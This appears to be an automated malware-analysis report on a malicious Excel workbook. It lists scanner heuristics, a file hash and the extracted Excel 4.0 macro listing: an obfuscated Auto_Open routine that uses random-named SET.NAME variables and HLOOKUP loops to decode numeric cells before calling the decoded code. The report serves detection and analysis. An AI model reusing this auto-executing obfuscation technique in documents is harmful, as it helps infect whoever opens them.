MALICIOUS
Risk Score: 140
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6851 bytes |

SHA-256: b5d1aaa208ef0b4a6543e7094f968122dbeeaa4381f703415ae24b28144a13cd

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - QvQURaKowBL
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B193
' 0018 24 LABEL : Cell Value, String Constant - bLJSizSIq len=0
' 0018 20 LABEL : Cell Value, String Constant - CptDF len=0
' 0018 24 LABEL : Cell Value, String Constant - crFdwmIIW len=0
' 0018 25 LABEL : Cell Value, String Constant - CtsCBVkSaG len=0
' 0018 26 LABEL : Cell Value, String Constant - DRpRWJvngfh len=0
' 0018 23 LABEL : Cell Value, String Constant - EPSYWuwd len=0
' 0018 26 LABEL : Cell Value, String Constant - HxZxMefedIg len=0
' 0018 27 LABEL : Cell Value, String Constant - iLLqFSfBTgTa len=0
' 0018 24 LABEL : Cell Value, String Constant - IOZDSirhB len=0
' 0018 20 LABEL : Cell Value, String Constant - jmZlS len=0
' 0018 20 LABEL : Cell Value, String Constant - jTWyl len=0
' 0018 25 LABEL : Cell Value, String Constant - ljrBqcyhOy len=0
' 0018 20 LABEL : Cell Value, String Constant - LwfKA len=0
' 0018 21 LABEL : Cell Value, String Constant - mGyYuB len=0
' 0018 23 LABEL : Cell Value, String Constant - NBxcdVFR len=0
' 0018 27 LABEL : Cell Value, String Constant - pRULlACJymxL len=0
' 0018 24 LABEL : Cell Value, String Constant - tAybchnHW len=0
' 0018 25 LABEL : Cell Value, String Constant - TjJZLRYzFo len=0
' 0018 20 LABEL : Cell Value, String Constant - uVWyp len=0
' 0018 25 LABEL : Cell Value, String Constant - yAgLbvoIAk len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' QvQURaKowBL,S51,"",32.00000000000000000000
' QvQURaKowBL,S52,"",298.00000000000000000000
' QvQURaKowBL,S53,"",267.00000000000000000000
' QvQURaKowBL,S54,"",-905.00000000000000000000
' QvQURaKowBL,S55,"",-17.00000000000000000000
' QvQURaKowBL,S56,"",643.00000000000000000000
' QvQURaKowBL,B92,"SET.NAME("EPSYWuwd",0+VALUE("0"))",""
' QvQURaKowBL,B97,"SET.NAME("CptDF",EPSYWuwd)",""
' QvQURaKowBL,B100,"SET.NAME("IOZDSirhB",EPSYWuwd)",""
' QvQURaKowBL,B104,"SET.NAME("TjJZLRYzFo",COUNTA(uVWyp))",""
' QvQURaKowBL,B108,"SET.NAME("bLJSizSIq",COUNTA(ljrBqcyhOy))",""
' QvQURaKowBL,B113,[],""
' QvQURaKowBL,B116,"SET.NAME("crFdwmIIW","")",""
' QvQURaKowBL,B121,"CptDF",""
' QvQURaKowBL,B126,"SET.NAME("pRULlACJymxL",HLOOKUP("*",uVWyp,CptDF,FALSE))",""
' QvQURaKowBL,B130,"yAgLbvoIAk",""
' QvQURaKowBL,B132,"SET.NAME("NBxcdVFR",EPSYWuwd)",""
' QvQURaKowBL,B135,[],""
' QvQURaKowBL,B137,"NBxcdVFR",""
' QvQURaKowBL,B140,"CtsCBVkSaG",""
' QvQURaKowBL,B145,"tAybchnHW",""
' QvQURaKowBL,B149,"jTWyl",""
' QvQURaKowBL,B154,"SET.NAME("LwfKA",VALUE(HLOOKUP("*",ljrBqcyhOy,jTWyl,FALSE)))",""
' QvQURaKowBL,B158,"DRpRWJvngfh",""
' QvQURaKowBL,B163,"crFdwmIIW",""
' QvQURaKowBL,B166,"IOZDSirhB",""
' QvQURaKowBL,B171,NEXT(),""
' QvQURaKowBL,B174,"iLLqFSfBTgTa",""
' QvQURaKowBL,B176,[],""
' QvQURaKowBL,B181,"mGyYuB",""
' QvQURaKowBL,B186,NEXT(),""
' QvQURaKowBL,B188,RETURN(),""
' QvQURaKowBL,B217,"SET.NAME("jmZlS",B92)",""
' QvQURaKowBL,B220,"uVWyp",""
' QvQURaKowBL,B225,"SET.NAME("ljrBqcyhOy",R80C15)",""
' QvQURaKowBL,B229,"SET.NAME("mGyYuB",237)",""
' QvQURaKowBL,B232,"SET.NAME("HxZxMefedIg",2)",""
' QvQURaKowBL,B236,jmZlS(),""
' QvQURaKowBL,B237,HALT(),""